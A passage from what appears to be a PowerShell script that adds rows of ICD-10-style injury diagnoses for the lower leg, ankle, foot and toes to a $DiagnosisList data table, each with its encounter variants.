of lower end of left fibula","Other physeal fracture of lower end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left fibula","Other physeal fracture of lower end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left fibula","Other physeal fracture of lower end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left fibula","Other physeal fracture of lower end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left fibula","Other physeal fracture of lower end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left fibula","Other physeal fracture of lower end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified fibula","Other physeal fracture of lower end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified fibula","Other physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified fibula","Other physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified fibula","Other physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified fibula","Other physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified fibula","Other physeal fracture of lower end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified lower leg","Other specified injuries of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified lower leg","Other specified injuries of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified lower leg","Other specified injuries of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right lower leg","Other specified injuries of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right lower leg","Other specified injuries of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right lower leg","Other specified injuries of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left lower leg","Other specified injuries of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left lower leg","Other specified injuries of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left lower leg","Other specified injuries of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified lower leg","Unspecified injury of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified lower leg","Unspecified injury of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified lower leg","Unspecified injury of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right lower leg","Unspecified injury of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right lower leg","Unspecified injury of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right lower leg","Unspecified injury of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left lower leg","Unspecified injury of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left lower leg","Unspecified injury of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left lower leg","Unspecified injury of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ankle","Contusion of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ankle","Contusion of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ankle","Contusion of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right ankle","Contusion of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ankle","Contusion of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ankle","Contusion of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left ankle","Contusion of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ankle","Contusion of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ankle","Contusion of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right great toe without damage to nail","Contusion of right great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right great toe without damage to nail","Contusion of right great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right great toe without damage to nail","Contusion of right great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left great toe without damage to nail","Contusion of left great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left great toe without damage to nail","Contusion of left great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left great toe without damage to nail","Contusion of left great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified great toe without damage to nail","Contusion of unspecified great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified great toe without damage to nail","Contusion of unspecified great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified great toe without damage to nail","Contusion of unspecified great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right lesser toe(s) without damage to nail","Contusion of right lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right lesser toe(s) without damage to nail","Contusion of right lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right lesser toe(s) without damage to nail","Contusion of right lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left lesser toe(s) without damage to nail","Contusion of left lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left lesser toe(s) without damage to nail","Contusion of left lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left lesser toe(s) without damage to nail","Contusion of left lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lesser toe(s) without damage to nail","Contusion of unspecified lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lesser toe(s) without damage to nail","Contusion of unspecified lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lesser toe(s) without damage to nail","Contusion of unspecified lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right great toe with damage to nail","Contusion of right great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right great toe with damage to nail","Contusion of right great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right great toe with damage to nail","Contusion of right great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left great toe with damage to nail","Contusion of left great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left great toe with damage to nail","Contusion of left great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left great toe with damage to nail","Contusion of left great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified great toe with damage to nail","Contusion of unspecified great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified great toe with damage to nail","Contusion of unspecified great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified great toe with damage to nail","Contusion of unspecified great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right lesser toe(s) with damage to nail","Contusion of right lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right lesser toe(s) with damage to nail","Contusion of right lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right lesser toe(s) with damage to nail","Contusion of right lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left lesser toe(s) with damage to nail","Contusion of left lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left lesser toe(s) with damage to nail","Contusion of left lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left lesser toe(s) with damage to nail","Contusion of left lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lesser toe(s) with damage to nail","Contusion of unspecified lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lesser toe(s) with damage to nail","Contusion of unspecified lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lesser toe(s) with damage to nail","Contusion of unspecified lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified foot","Contusion of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified foot","Contusion of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified foot","Contusion of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right foot","Contusion of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right foot","Contusion of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right foot","Contusion of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left foot","Contusion of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left foot","Contusion of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left foot","Contusion of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right great toe","Abrasion, right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right great toe","Abrasion, right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right great toe","Abrasion, right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left great toe","Abrasion, left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left great toe","Abrasion, left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left great toe","Abrasion, left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified great toe","Abrasion, unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified great toe","Abrasion, unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified great toe","Abrasion, unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right lesser toe(s)","Abrasion, right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right lesser toe(s)","Abrasion, right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right lesser toe(s)","Abrasion, right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left lesser toe(s)","Abrasion, left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left lesser toe(s)","Abrasion, left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left lesser toe(s)","Abrasion, left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified lesser toe(s)","Abrasion, unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified lesser toe(s)","Abrasion, unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified lesser toe(s)","Abrasion, unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right great toe","Blister (nonthermal), right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right great toe","Blister (nonthermal), right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right great toe","Blister (nonthermal), right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left great toe","Blister (nonthermal), left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left great toe","Blister (nonthermal), left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left great toe","Blister (nonthermal), left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified great toe","Blister (nonthermal), unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified great toe","Blister (nonthermal), unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified great toe","Blister (nonthermal), unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right lesser toe(s)","Blister (nonthermal), right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right lesser toe(s)","Blister (nonthermal), right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right lesser toe(s)","Blister (nonthermal), right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left lesser toe(s)","Blister (nonthermal), left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left lesser toe(s)","Blister (nonthermal), left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left lesser toe(s)","Blister (nonthermal), left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified lesser toe(s)","Blister (nonthermal), unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified lesser toe(s)","Blister (nonthermal), unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified lesser toe(s)","Blister (nonthermal), unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right great toe","External constriction, right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right great toe","External constriction, right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right great toe","External constriction, right great toe, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left great toe","External constriction, left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left great toe","External constriction, left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left great toe","External constriction, left great toe, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified great toe","External constriction, unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified great toe","External constriction, unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified great toe","External constriction, unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right lesser toe(s)","External constriction, right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right lesser toe(s)","External constriction, right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right lesser toe(s)","External constriction, right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left lesser toe(s)","External constriction, left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left lesser toe(s)","External constriction, left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left lesser toe(s)","External constriction, left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified lesser toe(s)","External constriction, unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified lesser toe(s)","External constriction, unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified lesser toe(s)","External constriction, unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right great toe","Superficial foreign body, right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right great toe","Superficial foreign body, right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right great toe","Superficial foreign body, right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left great toe","Superficial foreign body, left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left great toe","Superficial foreign body, left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left great toe","Superficial foreign body, left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified great toe","Superficial foreign body, unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified great toe","Superficial foreign body, unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified great toe","Superficial foreign body, unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right lesser toe(s)","Superficial foreign body, right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right lesser toe(s)","Superficial foreign body, right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right lesser toe(s)","Superficial foreign body, right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left lesser toe(s)","Superficial foreign body, left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left lesser toe(s)","Superficial foreign body, left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left lesser toe(s)","Superficial foreign body, left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified lesser toe(s)","Superficial foreign body, unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified lesser toe(s)","Superficial foreign body, unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified lesser toe(s)","Superficial foreign body, unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right great toe","Insect bite (nonvenomous), right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right great toe","Insect bite (nonvenomous), right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right great toe","Insect bite (nonvenomous), right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left great toe","Insect bite (nonvenomous), left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left great toe","Insect bite (nonvenomous), left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left great toe","Insect bite (nonvenomous), left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified great toe","Insect bite (nonvenomous), unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified great toe","Insect bite (nonvenomous), unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified great toe","Insect bite (nonvenomous), unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right lesser toe(s)","Insect bite (nonvenomous), right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right lesser toe(s)","Insect bite (nonvenomous), right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right lesser toe(s)","Insect bite (nonvenomous), right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left lesser toe(s)","Insect bite (nonvenomous), left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left lesser toe(s)","Insect bite (nonvenomous), left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left lesser toe(s)","Insect bite (nonvenomous), left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified lesser toe(s)","Insect bite (nonvenomous), unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified lesser toe(s)","Insect bite (nonvenomous), unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified lesser toe(s)","Insect bite (nonvenomous), unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right great toe","Other superficial bite of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right great toe","Other superficial bite of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right great toe","Other superficial bite of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left great toe","Other superficial bite of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left great toe","Other superficial bite of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left great toe","Other superficial bite of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified great toe","Other superficial bite of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified great toe","Other superficial bite of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified great toe","Other superficial bite of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right lesser toe(s)","Other superficial bite of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right lesser toe(s)","Other superficial bite of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right lesser toe(s)","Other superficial bite of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left lesser toe(s)","Other superficial bite of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left lesser toe(s)","Other superficial bite of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left lesser toe(s)","Other superficial bite of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified lesser toe(s)","Other superficial bite of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified lesser toe(s)","Other superficial bite of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified lesser toe(s)","Other superficial bite of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right ankle","Abrasion, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right ankle","Abrasion, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right ankle","Abrasion, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left ankle","Abrasion, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left ankle","Abrasion, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left ankle","Abrasion, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified ankle","Abrasion, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified ankle","Abrasion, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified ankle","Abrasion, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right ankle","Blister (nonthermal), right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right ankle","Blister (nonthermal), right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right ankle","Blister (nonthermal), right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left ankle","Blister (nonthermal), left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left ankle","Blister (nonthermal), left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left ankle","Blister (nonthermal), left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified ankle","Blister (nonthermal), unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified ankle","Blister (nonthermal), unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified ankle","Blister (nonthermal), unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right ankle","External constriction, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right ankle","External constriction, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right ankle","External constriction, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left ankle","External constriction, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left ankle","External constriction, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left ankle","External constriction, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified ankle","External constriction, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified ankle","External constriction, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified ankle","External constriction, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right ankle","Superficial foreign body, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right ankle","Superficial foreign body, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right ankle","Superficial foreign body, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left ankle","Superficial foreign body, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left ankle","Superficial foreign body, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left ankle","Superficial foreign body, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified ankle","Superficial foreign body, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified ankle","Superficial foreign body, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified ankle","Superficial foreign body, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right ankle","Insect bite (nonvenomous), right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right ankle","Insect bite (nonvenomous), right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right ankle","Insect bite (nonvenomous), right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left ankle","Insect bite (nonvenomous), left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left ankle","Insect bite (nonvenomous), left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left ankle","Insect bite (nonvenomous), left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified ankle","Insect bite (nonvenomous), unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified ankle","Insect bite (nonvenomous), unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified ankle","Insect bite (nonvenomous), unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, right ankle","Other superficial bite of ankle, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, right ankle","Other superficial bite of ankle, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, right ankle","Other superficial bite of ankle, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, left ankle","Other superficial bite of ankle, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, left ankle","Other superficial bite of ankle, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, left ankle","Other superficial bite of ankle, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, unspecified ankle","Other superficial bite of ankle, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, unspecified ankle","Other superficial bite of ankle, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of ankle, unspecified ankle","Other superficial bite of ankle, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right foot","Abrasion, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right foot","Abrasion, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right foot","Abrasion, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left foot","Abrasion, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left foot","Abrasion, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left foot","Abrasion, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified foot","Abrasion, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified foot","Abrasion, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified foot","Abrasion, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right foot","Blister (nonthermal), right foot, initial encounter") + $null 